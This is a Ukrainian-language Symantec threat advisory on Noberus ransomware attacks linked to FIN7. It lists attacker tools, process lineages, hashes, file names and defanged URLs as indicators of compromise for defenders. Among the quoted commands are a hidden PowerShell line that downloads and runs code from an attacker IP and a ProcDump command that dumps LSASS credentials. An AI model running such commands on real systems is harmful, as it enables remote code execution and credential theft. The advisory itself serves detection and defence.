Professional Documents
Culture Documents
Poperedzhennya Pro Zagrozu - Noberus Indikatori Komprometatsii Z Neshchodavnikh Atak Ukr
Poperedzhennya Pro Zagrozu - Noberus Indikatori Komprometatsii Z Neshchodavnikh Atak Ukr
про загрозу
TLP: Amber
Coreid Усі
Мотивація атаки:
Псевдоніми виконавця:
Ransomware
Carbon Spider, FIN7
Усі
Огляд
Нещодавні атаки з використанням вірусу-вимагача Noberus показали, що зловмисники використовували великий набір
інструментів перед розгортанням корисного навантаження. Використовувалися різні інструменти для збору облікових даних,
зокрема Mimikatz, ProcDump і Net-GPPPassword.
Крім того, у якості інструменту зловмисники використовували нібито легітимний інструмент PCHunter, імовірно для знищення
процесів. Також було використано програму PowerTool, яка рекламується як anti-rootkit, але широко використовується для
відключення програм безпеки.
Зловмисники також застосовували SystemBC, добре відомий троян віддаленого доступу (RAT), який часто зустрічається в
розслідуваннях випадків вимагання. Хоча спочатку він був розроблений як RAT, у наші дні зловмисники використовують його
виключно як проксі-інструмент.
Інструменти, що використовуються:
Ransom.Noberus
AdFind: Загальнодоступний інструмент, який використовується для запиту Active Directory. Він має законне
застосування, але широко використовується зловмисниками для створення карти мережі.
BITSAdmin: Інструмент Microsoft, який можна використовувати для створення завдань на завантаження або
вивантаження і відстеження їх виконання.
PCHunter: Загальнодоступний інструмент, який можна використовувати для перегляду та завершення процесів.
PowerShell: Інструмент створення сценаріїв Microsoft, який можна використовувати для виконання команд, завантаження
корисного навантаження, обходу зламаних мереж і проведення розвідки.
PowerTool: Загальнодоступний інструмент для видалення руткітів, який можна використовувати для відключення захисного
програмного забезпечення.
ProcDump: Інструмент Microsoft Sysinternals для моніторингу програми на предмет стрибків процесора та створення дампів
збоїв, який також можна використовувати як загальну утиліту для створення дампів процесів.
Sharphound: Компонент збору даних для загальнодоступного інструменту тестування на проникнення Bloodhound.
SystemBC: Шкідлива програма, яка може відкрити бекдор на зараженому комп'ютері та використовувати проксі-протокол
SOCKS5 для зв'язку з командно-контрольним (C&C) сервером.
VssAdmin: Інструмент командного рядка Windows, який використовується для управління тіньовими копіями томів. Він може
використовуватися зловмисниками для видалення тіньових копій та/або зміни розміру виділеного простору. Зміна розміру може
обмежити простір, виділений для тіньових копій тому, що може перешкоджати створенню нових копій.
WinRAR: Менеджер архівів, який може використовуватися для архівування або zip-архівування файлів – наприклад, перед
ексфільтрацією.
.Індикатори компрометації:
Аналітики SOC повинні переглянути це попередження та пошукати у своїй мережі відповідні індикатори компрометації (IOC). Їх
наявність може вказувати на цілеспрямовану атаку, що готується. Якщо IOC є шкідливим, і файл доступний для нас, продукти
Symantec Endpoint виявлять і заблокують цей файл. Якщо під час аналізу ви виявите інші невідомі або недоступні файли, ви
можете надіслати їх до Symantec для аналізу.
Продукти Symantec будуть виявляти та попереджати про поведінку та методи, докладно описані в цьому попередженні. Щоб
отримати вказівки щодо пошуку IOC за допомогою EDR Symantec, прочитайте цей посібник для хмарного рішення або цей
посібник для рішення On-Prem.
Description: Ransom.Noberus
Process lineages: cmd.exe <- explorer.exe <- svchost.exe <- services.exe <- wininit.exe
vssadmin.exe <- cmd.exe <- xxx.exe <- cmd.exe <- explorer.exe <- svchost.exe <- services.exe <- wininit.exe
Commands: "CSIDL_SYSTEM_DRIVE\perflogs\xxx.exe" 2vflH1ZvHW5Rqk -tXEsr4rxbkrg -Q -1MqQTnXlck87BC -p
[REMOVED]
Process lineage: explorer.exe <- userinit.exe <- winlogon.exe <- smss.exe <- smss.exe
"CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe" "CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe" -
nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxp://179.60.146[.]6:80/asdfg'))"
Description: PowerTool
Description: PowerTool
Process lineages: explorer.exe <- userinit.exe <- winlogon.exe <- smss.exe <- smss.exe
Commands: "CSIDL_SYSTEM_DRIVE\perflogs\pto.exe"
Description: ProcDump
Process lineage: powershell.exe <- explorer.exe <- userinit.exe <- winlogon.exe <- smss.exe <- smss.exe
Commands: "CSIDL_SYSTEM_DRIVE\perflogs\procdump.exe" -accepteula -ma lsass
CSIDL_SYSTEM_DRIVE\perflogs\lsass.dmp
Description: WinRAR
Description: PCHunter
Process lineage: explorer.exe <- userinit.exe <- winlogon.exe <- smss.exe <- smss.exe
Commands: "CSIDL_SYSTEM_DRIVE\perflogs\pchunter64.exe"
Description: PCHunter
Commands: "CSIDL_SYSTEM_DRIVE\perflogs\pchunter64.exe"
Description: AdFind
Description: Mimikatz
Description: SystemBC
Description: SystemBC
Description: SystemBC
Process lineage: rundll32.exe <- powershell.exe <- explorer.exe <- svchost.exe <- services.exe <- wininit.exe
Description: SystemBC
Process lineage: rundll32.exe <- powershell.exe <- explorer.exe <- svchost.exe <- services.exe <- wininit.exe
Process lineage: cmd.exe <- wmiprvse.exe <- svchost.exe <- services.exe <- wininit.exe
Description: Net-GPPPassword
Description: Net-GPPPassword
Description: Net-GPPPassword
Description: Rubeus
Description: Sharphound
File name: sharphound.exe
05732e84de58a3cc142535431b3aa04efbe034cc96e837f93c360a6387d8faad
094d1476331d6f693f1d546b53f1c1a42863e6cde014e2ed655f3cbe63e5ecde
1e7737a57552b0b32356f5e54dd84a9ae85bb3acff05ef5d52aabaa996282dfb
2447f916b3a4e23bc5b08177a1744e89f921c2943695eac109e3fc84595b33b7
2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32
4b61b27ad8855fb66aaeacc0c232cbc9fc34152ad14ec73665aa46fce7b8a614
4c0571b257ff17a3f79b9ac5dedc967fb2d0c9a44091ca3afdb872d028a9bb67
51d04db63dc7428e28a864f899693ff2f7b062ef711a7f7e4e0d44c0111f81c7
5ee7ef6d04d5c624e17ca959af3495555ab94ef872adc0b9eb4bf6ba95e189be
67be2a5e7b30a949b42a7306b7c2cd139da4133a2ec0c0afdb59218f4649130a
732f242c91076d01973b283630b9ec406dd6961a1d9298bde177b6e96efb029f
842737b5c36f624c9420a005239b04876990a2c4011db87fe67504fa09281031
926fcb9483faa39dd93c8442e43af9285844a1fbbe493f3e4731bbbaecffb732
92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50
93e6fe87eb19a92e6def570f054d9166802c418cf38574829142bd055acf47e5
a7240d8a7aee872c08b915a58976a1ddee2ff5a8a679f78ec1c7cf528f40deed
c2ebcc389304539bc13c3d2023cf88f9ea0bac7210fefa03f8333eaab0bbb76d
d1aa0ceb01cca76a88f9ee0c5817d24e7a15ad40768430373ae3009a619e2691
d728113ddba63d4eb5b5cb1695f5810ddd29c1e7ca891395dd5b2a25cece86aa
dee933e8c104e9cdcbc63b10490dc94b04cef3029de8d80bf61ece90f7ef7006
ff5e7e7c8a82b92328376ef23ff0a2c6506c0876702a3dd9869878f886567741
ad.bat
adf.bat
adfind.exe
get-gpppasswordmod.ps1
invoke-rubeus.ps1
mimkatz.exe
net-gpppassword.exe
pchunter64.exe
procdump.exe
pt.exe
pto.exe
runsys.exe
sharphound.exe
socks32.dll
socks64.dll
winrar.exe
xxx.exe
hxxp://powersupportplan[.]com/files/templates.gif
hxxp://179.60.146[.]6:80/asdfgd
Copyright © 2023 Broadcom. All Rights Reserved. The term “Broadcom” refers to Broadcom Inc. and/or its
subsidiaries. For more information, go to www.broadcom.com. All trademarks, trade names, service marks, and logos
referenced herein belong to their respective companies.
Broadcom reserves the right to make changes without further notice to any products or data herein to improve
reliability, function, or design. Information furnished by Broadcom is believed to be accurate and reliable. However,
Broadcom does not assume any liability arising out of the application or use of this information, nor the application or
use of any product or circuit described herein, neither does it convey any license under its patent rights nor the rights of
others.